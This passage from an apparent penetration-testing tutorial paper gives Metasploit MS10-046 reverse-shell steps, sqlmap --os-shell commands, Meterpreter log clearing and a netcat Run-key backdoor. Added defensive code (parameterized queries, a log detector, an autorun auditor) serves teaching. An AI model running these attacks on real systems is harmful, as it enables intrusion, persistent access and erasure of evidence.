This will dump out the usernames and passwords from the accounts table. Keep in mind that the
statement before the single apostrophe we used to abruptly end it was:
SELECT * FROM accounts WHERE username='
These examples are a great way to start a pentest against a Windows box. The next step
would be to look into command injection. It is similar to SQL injection but a little more jagged.
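The following is an added example, not from this paper or from the books it quotes, that runs the queries above against an in-memory SQLite database (Python’s built-in sqlite3; the table and column names follow the section, the rows are constructed). It shows why the admin'-- and OR '1'='1' inputs work against a string-built query, reproduces the NULL-incrementing UNION probe described in the text, and sets the parameterized form beside each vulnerable query, which is the fix a developer would apply.

```python
"""The string-built queries from this section beside parameterized ones (sqlite3)."""
import sqlite3
from typing import List, Optional, Tuple


def build_db() -> sqlite3.Connection:
    """In-memory database; table names follow the section, the rows are constructed."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 's3cret-admin'), ('marcus', 'secret');
        CREATE TABLE user_data (first_name TEXT, last_name TEXT);
        INSERT INTO user_data VALUES ('Tom', 'Smith'), ('Ann', 'Tom'), ('Bob', 'Lee');
    """)
    return conn


def login_vulnerable(username: str, password: str) -> Optional[str]:
    """Concatenates input into SQL. With username admin'-- the comment swallows
    the password clause, exactly as the quoted Stuttard example describes."""
    conn = build_db()
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(username: str, password: str) -> Optional[str]:
    """Parameterized: the input is bound as data and is never parsed as SQL."""
    conn = build_db()
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def search_vulnerable(last_name: str) -> List[Tuple[str, str]]:
    """Wilhelm's user_data query built by concatenation."""
    conn = build_db()
    sql = f"SELECT * FROM user_data WHERE last_name = '{last_name}'"
    return conn.execute(sql).fetchall()


def search_safe(last_name: str) -> List[Tuple[str, str]]:
    """Same query with a bound parameter; Tom' OR '1'='1 matches no row."""
    conn = build_db()
    return conn.execute("SELECT * FROM user_data WHERE last_name = ?",
                        (last_name,)).fetchall()


def union_column_count(max_columns: int = 8) -> Optional[int]:
    """The NULL-incrementing probe from the text, against the vulnerable search:
    the first UNION that raises no column-count error has the right width."""
    for n in range(1, max_columns + 1):
        nulls = ",".join(["NULL"] * n)
        try:
            search_vulnerable(f"x' UNION SELECT {nulls} -- ")
            return n
        except sqlite3.OperationalError:   # "SELECTs ... do not have the same number of result columns"
            continue
    return None


if __name__ == "__main__":
    print("vulnerable login as admin'--:", login_vulnerable("admin'--", "foo"))
    print("parameterized login as admin'--:", login_safe("admin'--", "foo"))
    print("rows for Tom' OR '1'='1:", len(search_vulnerable("Tom' OR '1'='1")))
    print("user_data column count by UNION probe:", union_column_count())
```

SQLite, like MySQL, treats -- as a line comment, so the behaviour matches the text; the point to take away is that in the parameterized versions the same inputs are just strings that match nothing.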
5 Penetration Attempt
After we have executed some reconnaissance and found vulnerabilities, we can either start
brute forcing the victim’s PC or use what we have and start launching attacks via
Metasploit and other automated tools like SQLmap. When it comes down to this stage you
have to remember there are people on pentesting teams dedicated to just the penetration part.
These individuals are highly trained and usually have a background in system administration or
engineering. The reason for this is that when you finally enter a victim’s PC you must know how
to navigate and set up additional parts of the environment, like backdoors. In addition, you also
need the knowledge to disable startup processes and possibly antivirus as well. If the computer
is part of a domain then it will pay off to be able to exploit that as well if it is poorly set up. For
the next couple of sections I will be on Kali Linux initiating the attack, so brush up on your
Linux!
5.1 Penetration Attempt
Metasploit is available on Windows and Linux. I prefer the Linux platform for its
flexibility. The main purpose of Metasploit is to launch attacks on vulnerable services, although
there are a plethora of tools contained within this suite. To give you an example of the
functionality, Nmap is natively tied into this suite, as well as some web server hosting tools.
Metasploit is the Swiss army knife when it comes to penetration testing. I will begin this section
by exploiting MS10-046. Again, the format of the exploit title is given out by Microsoft: the first
part is the year and the last part is the number, incremented for each one they have disclosed.
MS10-046 is a vulnerability in the handling of Windows shortcut files (.LNK) that can contain
an icon resource pointing to a malicious DLL. The Metasploit module for this creates a
WebDAV service that can be used to run an arbitrary payload when accessed as a UNC path.
First we start the Metasploit Framework by typing the following command.
msfconsole
This will start the suite and load up a modified shell. From there we type
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
This loads the module for that particular exploit. From there you are able to set options for
the payload and even the exploit. Some options may be required. To see the options, type
show options
Now we will set the current payload
set payload windows/meterpreter/reverse_tcp
Meterpreter is where all the magic happens: after the payload launches, Meterpreter gives us
a nice shell back to the Windows 7 box. Meterpreter uses DLL injection and communicates over a
Ruby stager socket. It gives us remote command line ability. We are going to set the
options to use the local host as the hosting server for our malicious site.
set SRVHOST 192.168.1.15
set LHOST 192.168.1.15
Review your options after you are done. That’s it! Now we can exploit; simply type exploit.
Now we social engineer our victim into either going to the following page
\\192.168.1.15\mhjs\
or we can get them to render the icon of this URL
http://192.168.1.15/<anything>.lnk
This will cause a Meterpreter session to be opened, giving you a shell to the box.
Meterpreter session 1 opened (192.168.1.15:4444 -> 192.168.1.13:53636)
To get to your session you type
sessions -i 1
That is all for Metasploit basics. This example is especially significant to me because social
engineering pentesting combined with the direct attack methodologies of something like Metasploit
makes this very potent. Most people fall victim to social engineering attacks. I will continue
where we left off on this in sections 6.1 and 6.2. In the next section I am going to discuss how to
use SQLmap, which is a tool that has a place in my heart for dumping databases like a champ.
5.2 Webapp penetration and database dumping
SQLmap is a fantastic tool for finding SQL injections, manipulating database queries,
and dumping databases. It is the tool I use in combination with Metasploit. I will first
explain what GET and POST parameters are, to refresh your memory. In simpler terms, a GET
method requests data from a specific resource and a POST method submits data to be
processed by a specific resource. Both methods travel within HTTP, although GET key-value
pairs are within the URL and POST’s are in the data portion of the request itself. There are many
other pros and cons to them, but I will exploit both for a better example. Let’s start with
exploitation of the GET parameter.
Finding whether the SQL injection is valid (the result will be the banner if valid):
sqlmap -u "http://site.com/info.php?user=test&pass=test" -b
(Kim 70)
Retrieving the database username:
sqlmap -u "http://site.com/info.php?user=test&pass=test" --current-user
(Kim 70)
Interactive shell:
sqlmap -u "http://site.com/info.php?user=test&pass=test" --os-shell
(Kim 70)
If you are stuck with the commands and need help, you can always type sqlmap --wizard.
The -u signifies the target URL, if you did not catch on. Kim states, “If you need to test an
authenticated SQLmap injection finding, log into the website via a browser and grab the cookie.
Then you can define it using the data=[COOKIE] switch.” (Kim 70).
Next, I will move on to using the POST method.
Finding whether an SQL injection is valid (the result will be in the banner if valid):
sqlmap -u http://site.com/info.php --data="user=test&pass=test" -b
(Kim 71)
Retrieving the database username:
sqlmap -u http://site.com/info.php --data="user=test&pass=test" --current-user
(Kim 71)
Interactive shell:
sqlmap -u http://site.com/info.php --data="user=test&pass=test" --os-shell
(Kim 71)
SQLmap has a collection of SQL injection techniques built in. You may specify whether you want a
blind injection, where the test may be a little harder but such cases are more frequently caught, or
even a time-based method, where we send a wait command to the DB and time when the database
responds. If the response is delayed then we have successfully used the injection. We are able to
retrieve a lot out of this injection, from what was stated. The shell is considered gold if you can get
it. The other option besides SQLmap is SQLninja. You would use it because it may help evade IPS
signatures that would possibly detect SQLmap-based injections.
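From the defender’s side, the injection techniques listed above (tautology, UNION, comment terminators, time-based delays) and SQLmap’s own requests leave recognisable traces in the web server’s access log. This added example, which is not part of the paper or of SQLmap, parses constructed Apache-style log lines aimed at the same info.php?user=...&pass=... URL and flags those patterns plus SQLmap’s default User-Agent string; the IP addresses, timestamps and log lines are all made up.

```python
"""Spot SQL injection probing (tautology, UNION, time-based) in web access logs."""
import re
from collections import Counter
from typing import Dict, List
from urllib.parse import unquote_plus

# Constructed sample lines in Apache combined log format; not real traffic.
# The target path mirrors the info.php?user=...&pass=... URL used in this section.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Oct/2014:10:00:01 -0700] "GET /info.php?user=test&pass=test HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Oct/2014:10:00:02 -0700] "GET /info.php?user=test%27%20OR%20%271%27%3D%271&pass=x HTTP/1.1" 200 9812 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Oct/2014:10:00:03 -0700] "GET /info.php?user=test%27%20UNION%20SELECT%20null%2Cnull%2Cnull%2Cnull%2Cnull--%20- HTTP/1.1" 500 120 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Oct/2014:10:00:04 -0700] "GET /info.php?user=test%27%20AND%20SLEEP%285%29--%20- HTTP/1.1" 200 512 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
10.0.0.7 - - [01/Oct/2014:10:00:05 -0700] "POST /info.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Request-line indicators, applied to the URL-decoded path and query.
PATTERNS = {
    "tautology": re.compile(r"'\s*or\s*'?\d+'?\s*=\s*'?\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "comment_terminator": re.compile(r"--|/\*"),
    "time_based": re.compile(r"\b(sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b", re.I),
}
# SQLmap's default User-Agent starts with "sqlmap/<version>".
SQLMAP_UA = re.compile(r"^sqlmap/", re.I)


def scan_log(text: str) -> List[Dict[str, object]]:
    """Return one record per suspicious request with the indicators it tripped."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                      # malformed line: skip rather than crash
        decoded = unquote_plus(m["path"])  # %27 -> ', %20 -> space, etc.
        findings = [name for name, rx in PATTERNS.items() if rx.search(decoded)]
        if SQLMAP_UA.search(m["ua"]):
            findings.append("sqlmap_agent")
        if findings:
            hits.append({"ip": m["ip"], "ts": m["ts"], "status": m["status"],
                         "request": decoded, "findings": findings})
    return hits


def suspicious_ips(hits: List[Dict[str, object]]) -> Dict[str, int]:
    """Count of flagged requests per source address, for prioritising a response."""
    return dict(Counter(h["ip"] for h in hits))


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for h in found:
        print(h["ip"], h["status"], h["findings"], h["request"])
    print(suspicious_ips(found))
```

Note that POST bodies (the --data form above) do not appear in a standard access log, so the POST line in the sample is invisible to this check; catching those requires request-body logging at the application or a WAF in front of it.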
6 Covering Tracks and Persistence
The reason to cover your tracks when you are in a system should be common sense.
When you enter a system you do not want to leave behind a digital footprint. Wilhelm gives us a
reason to stay stealthy: “System administrators use similar techniques to identify malicious
activity, when compared to network defenses. A system administrator can examine log files,
install applications that watch for malicious software, and set up monitors on a system to see if
anything inappropriate is running (such as a backdoor or brute force application) and harden their
systems in such a way that any changes within essential system files are prevented and alerted
upon.” (Wilhelm 391).
Thomas also states, “Professional penetration testing requires stealth to avoid detection
during attacks that traverse the target network, but rarely involves covering tracks while in a target
system. In cases where part of the project is to determine the ability of the system administrators
to detect attacks, some of the techniques in this chapter can be useful.” (Wilhelm 405)
There are some very basic methods for covering your tracks, like using reverse tunnels
connected through proxies or using a VPN. The most common and more frequently used
methods are wiping logs and hiding files. This should be routine for penetration testers; if this
little step is missed, you will have all your activity logged, whether it is in Linux or in
Windows. System administrators use log files very frequently to debug and to detect, as Wilhelm
mentioned. Their main duty at work is to view the logs daily, and some go to the extent of doing
that every 30 minutes. So being up to date on logging activity is essential.
6.1 Keep calm…Clear the logs
If we have a session opened by Meterpreter, clearing the logs is as simple as typing:
getsystem
clearev
Below is an example output.
CLEARING LOGS
Figure 3 – from null-byte.wonderhowto.com
Hiding files is very basic but will not necessarily help you elude virus detection and so
forth. It is still used every time as good practice to hide files from the victim’s naked eye.
Hiding a file is simply done with this command:
attrib +h virus.exe
virus.exe is just an example; you may put any file you like in there.
6.2 Backdoors for Everyone!
Persistence is another thing we are concerned about when we want to maintain current
access to the box. Wilhelm states, “Our original compromise of the system may become blocked
through system patching or network changes preventing us from exploiting the system whenever
we need access.” (Wilhelm 387). I will explain how to be persistent and set up a netcat backdoor.
First we need to get a Meterpreter session like before; once we have that we can upload the
backdoor, which is netcat, a program that reads from and writes to sockets.
upload /usr/share/windows-binaries/tools/nc.exe C:\\windows\\system32
Next we need to make netcat start up on port 443 when Windows starts. First we list the existing
Run key:
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
Then we add netcat into the startup process.
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe'
Next we configure the computer to allow remote connections into the victim’s box through
443.
netsh advfirewall firewall add rule name="svchost service" dir=in action=allow protocol=TCP localport=443
That is it. Now, on the attacking machine, you should be able to connect to the victim with netcat
using this command.
nc -v victim_ip_address 443
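Every step of the backdoor above leaves an artefact an administrator can audit: a new value under the Run key, an nc.exe in system32 and a firewall rule whose name imitates a Windows service. This added example, which is not from this paper or from Metasploit, checks the first of those: it parses constructed output in the style of reg query for the Run key and flags values whose command matches the pattern used above (a netcat-family binary, a listening port, a shell bound with -e). The value names, paths and the reg query text are made up.

```python
"""Audit Run-key autoruns for the netcat-style backdoor described in this section."""
import re
from dataclasses import dataclass, field
from typing import List, Tuple

# Constructed output in the style of `reg query HKLM\...\Run`; not from a real host.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    nc    REG_SZ    C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe
    OneDrive    REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
"""

# One value per line: name, type and data separated by runs of spaces.
VALUE_RE = re.compile(r"^\s+(?P<name>.+?)\s{2,}(?P<type>REG_\w+)\s{2,}(?P<data>.*)$")

# Indicators drawn from the command shown in this section.
INDICATORS = [
    ("binds a shell to a socket (-e cmd.exe / powershell)",
     re.compile(r"-e\s+(cmd(\.exe)?|powershell(\.exe)?)\b", re.I)),
    ("netcat-family binary",
     re.compile(r"\b(nc|ncat|netcat)(\.exe)?\b", re.I)),
    ("listening mode with a port (-l/-L with -p)",
     re.compile(r"-[lL]\w*p\b|-[lL]\b.*-p\b")),
]


@dataclass
class AutorunFinding:
    name: str
    data: str
    reasons: List[str] = field(default_factory=list)


def parse_reg_query(text: str) -> List[Tuple[str, str, str]]:
    """Extract (name, type, data) triples; the key header line is skipped."""
    entries = []
    for line in text.splitlines():
        m = VALUE_RE.match(line)
        if m:
            entries.append((m["name"], m["type"], m["data"]))
    return entries


def audit_autoruns(text: str) -> List[AutorunFinding]:
    """Return every autorun value whose command trips at least one indicator."""
    findings = []
    for name, _type, data in parse_reg_query(text):
        reasons = [why for why, rx in INDICATORS if rx.search(data)]
        if reasons:
            findings.append(AutorunFinding(name, data, reasons))
    return findings


if __name__ == "__main__":
    for f in audit_autoruns(SAMPLE_REG_QUERY):
        print(f"{f.name}: {f.data}")
        for r in f.reasons:
            print("   -", r)
```

Clearing the event logs with clearev, as in 6.1, does not remove this registry trace, and the clearing itself is recorded: Windows writes Security event 1102 (the audit log was cleared) as the first entry of the new log.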
Conclusion
Penetration testing is breaking into a network to document vulnerabilities; it is sometimes
called a “threat and vulnerability assessment”. Even though systems are complicated or poorly
understood, the field has come a long way in recent years. Some of the best penetration testers that
I know in the industry are self-taught and have a drive and passion to learn everything in sight.
With technology continuously changing, much of their success comes not from knowledge kept
but from knowledge shared, and the collaboration of knowledge is essential to every pentester.
Since the breadth of knowledge in this field is massive, for some it may be best to pick a
specialization and grow in that area. However, you do not need to stay specialized, and it does
help to learn fields outside your own. The main thing to remember when in the penetration business
is to keep up with current methodologies and be willing to expand your intellect on some of the
more challenging aspects. I must warn that there is a spectrum of negativity with pentesting due
to the ease of exploitation. The most recognizable form can be found in social engineering, since it
is a subfield of penetration testing. With humans, first you undermine the person and then
exploit him or her when you have gained the leverage. Another example is a customer trying to use
fake money at a store to see if the cashier accepts it. The underlying goal in both situations is to
take advantage of someone. A penetration tester can do the same with a computer without having
any human interaction. This is why some people believe penetration testing is more of a “hidden
education”, because the direct knowledge learned from it can be used for malicious intent. With
that being said, it is wise to manage your talent, intellect, knowledge, and competitive urge and
use them for a good purpose. Penetration testing is only orthodox when there is a legally binding
contract. Life is about continuous learning, growing and the discovery of new things. Apply this
passion to computer technology and the sky is the limit for success.
References
Gallagher, Tom, Bryan Jeffries, and Lawrence Landauer. Hunting Security Bugs. Redmond,
WA: Microsoft, 2006. Print.
Kim, Peter. The Hacker Playbook: Practical Guide to Penetration Testing. North Charleston,
SC: Secure Planet, LLC, 2014. Print.
Wilhelm, Thomas. Professional Penetration Testing: Creating and Operating a Formal Hacking
Lab. Burlington, MA: Syngress Pub., 2010. Print.
Stuttard, Dafydd, and Marcus Pinto. The Web Application Hacker's Handbook: Finding and
Exploiting Security Flaws. Indianapolis, IN: Wiley, 2011. Print.
DeFino, Steven. Official Certified Ethical Hacker Review Guide. Boston, MA: Course
Technology, Cengage Learning, 2010. Print.
Lyon, Gordon Fyodor. Nmap Network Scanning: Official Nmap Project Guide to Network
Discovery and Security Scanning. Sunnyvale, CA: Insecure.Com, LLC, 2008. Print.
Chen, S., J. Xu, Z. Kalbarczyk, and K. Iyer. "Security Vulnerabilities: From Analysis to
Detection and Masking Techniques." Proceedings of the IEEE 94.2 (2006): 407-18.
Microsoft Research. Microsoft, Feb. 2006. Web. 5 Oct. 2014.
<http://research.microsoft.com/en-us/um/people/shuochen/papers/ieee-proc.pdf>.
Kane, Brian. "Introduction." Journal of Music Theory 54.1, Cavell's "Music Discomposed" at 40
(2010): 1-4. Print.
WhiteHat Security. WhiteHat Security, May 2013. Web. 10/1 Oct. 2014.
<https://www.whitehatsec.com/assets/WPstatsReport_052013.pdf>.
Appendix